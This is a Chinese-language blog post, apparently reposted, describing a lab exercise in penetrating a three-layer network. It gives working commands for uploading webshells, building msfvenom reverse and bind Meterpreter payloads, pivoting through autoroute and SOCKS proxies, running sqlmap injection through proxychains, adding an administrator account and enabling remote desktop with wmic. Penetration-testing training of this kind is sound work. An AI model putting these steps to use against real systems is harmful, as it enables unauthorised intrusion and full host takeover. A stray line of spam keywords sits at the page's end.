<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    三層網絡滲透測試實驗

    VSole2022-03-14 21:51:38

    聲明:此次滲透環境為實驗環境,僅供滲透實驗學校參考

    前言

    在滲透測試過程中我們會遇到很多不同的網絡情況,或許普通的內網滲透我們已經很熟練了,但在現實環境中或許會有多層網絡結構,如果遇到多層網絡結構我們應該如何進行滲透呢?

    利用這個實驗我們就可以更清晰的了解多層網絡滲透測試的過程。并了解通過msf進行內網滲透,由一級代理到二級代理的搭建來進行對三層網絡的滲透的過程。

    【三層網絡拓撲圖】

    【第一層主機】

    目標ip:192.168.31.207

    訪問目標ip發現是一個文件上傳頁面

    經測試可通過文件類型MIME繞過進行上傳php腳本,上傳成功后返回路徑

    訪問返回的文件路徑,成功連接到php大馬

    查看ip發現該主機是雙網卡,第二層網絡段為192.168.1.0/24

    為進一步進行內網滲透,我們上傳msf后門

    后門制作:

    1.msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.207 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf

    將后門上傳到第一層主機192.168.31.207

    設置msf監聽

    在第一層主機上運行shell.elf

    Chmod 777 shell.elf
    ./shell.elf
    

    msf獲得meterpreter

    將第一層的meterpreter切換到后臺運行

    1.background

    【第二層主機】

    利用第一層的meterpreter添加第二層的路由

    1.run autoroute -s 192.168.1.0/24

    掃描發現第二層主機ip為192.168.1.100

    接著利用msf搭建socks代理,好讓攻擊機直接打第二層網絡:

    1.use auxiliary/server/socks4a

    設置好代理后訪問192.168.1.100成功訪問到網站

    利用弱口令admin/admin登錄到后臺

    在設置處發現可修改允許上傳文件的類型,修改后保存設置

    在撰寫新文章處添加附件可直接上傳php腳本

    成功連接到php大馬

    為了打開第三層,我們需要在第二層主機上傳msf后門

    制作后門:

    msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=1234 -f elf > ding.elf
    

    利用大馬上傳,并在第二層主機上運行

    chmod 777 ding.elf
    ./ding.elf
    

    設置msf相關配置

    成功獲取到第二層主機meterpreter

    查看ip發現第三層網段為192.168.2.0/24

    利用第二層主機的meterpreter添加第三層的網絡路由

    啟用一個socks4a代理給第三層網絡,端口設置為2334

    然后在配置文件中加上

    1.socks4 192.168.31.119  2334

    利用獲得的meterpreter發現第三層目標主機為192.16.2.100

    【第三層主機】

    使用代理打開Firefox訪問第三層主機ip192.168.2.100

    通過測試發現http://192.168.2.100/category.php?cat_id=1處存在sql注入

    利用proxychains跑一下sqlmap

    1.proxychains sqlmap -u"http://192.168.2.100/category.php?cat_id=1"

    成功注出后臺賬號和加密的密碼

    發現管理員密碼解不開,

    利用nmap掃描網站后臺路徑。

    1.proxychains nmap --script http-enum -p80 192.168.2.100

    發現有個上傳點

    測試發現該上傳點是前端檢測,利用JavaScript繞過即可上傳成功

    訪問/upload/uploads/webshelldama.php成功連接到php大馬

    利用大馬查看發現是windows2003系統

    添加用戶賬號密碼

    將添加的用戶賬號密碼添加到管理組

    利用大馬開啟3389端口

    1.wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

    成功開啟3389端口

    利用添加的管理員賬號密碼成功登錄到遠程桌面

    版權申明:內容來源網絡,版權歸原創者所有。除非無法確認,都會標明作者及出處,如有侵權,煩請告知,我們會立即刪除并致歉!

    滲透測試網絡滲透
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    在網絡安全領域,全球越來越多的公司正在嘗試將人工智能、機器學習等集成到產品之中,智能化、自動化都是網絡安全領域的熱詞。
    所以滲透測試是安全評估的方法之一。隨著信息技術的發展,網絡已成為一個新的戰場。美國智庫蘭德公司稱網絡戰為信息時代的核武器,能夠在網絡上引發核爆的網絡戰,從過去的網絡威懾已經開始向實戰邁進。中國也是遭受網絡攻擊最多的國家之一,特別是在一些關鍵時期,例如每年兩會期間、G20期間、以及這次新冠病毒疫情期間,我國遭受的網絡攻擊都要比正常事情多的多。xxx.xxx.22.0/24確認這c段ip有可能就是目標單位的資產ip段。
    不存在“超范圍”的滲透測試觀念Web應用程序已經變得非常復雜,會涉及較廣泛的資源和資產整合與利用。開發人員可能認為這些資產“超范圍”,因此不需要對它們負責。應用系統開發人員應該更好地與安全測試人員合作,減少滲透測試工作帶來的流程影響。跨站腳本攻擊不可忽視XSS屬于被動式攻擊,是一種較盛行的Web應用程序漏洞利用方式。
    利用這個實驗我們就可以更清晰的了解多層網絡滲透測試的過程。并了解通過msf進行內網滲透,由一級代理到二級代理的搭建來進行對三層網絡滲透的過程。
    旨在確定組織的用戶群對魚叉式網絡釣魚攻擊的敏感性。這些評估的結果可以用于增強組織的反社會工程意識計劃。在此評估類型中,測試人員會將部署看似普通的USB驅動器,并誘使用戶將該設備插入公司系統。在此評估期間,組織通常會向測試人員提供憑據訪問權限,以審查整個應用程序。這類測試通常會在安全團隊大多數成員完全不知情的情況下執行。紅藍對抗測試有多種形式。有時藍隊被告知模擬或滲透測試的時間,有時則完全不知情。
    五大類滲透測試
    2022-02-21 21:47:45
    滲透測試已經成為安全體系的評估、運營和改進的基礎常規工作,是現代組織用來加強網絡安全態勢和防止數據泄露的有效方法。
    SCRIPTKIDDI3是一款功能強大的網絡偵查與初始漏洞檢測工具,該工具可以幫助我們以自動化的形式完成網絡滲透測試初始階段的網絡偵查以及漏洞檢測任務。SCRIPTKIDDI3專為漏洞獎勵計劃設計,使用了各種開源工具和Shell腳本,允許我們以快速高效的形式在目標域上運行掃描并識別潛在的漏洞。SCRIPTKIDDI3首先會在目標系統上執行偵察,收集子域名等信息,并使用Nuclei運行服務。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类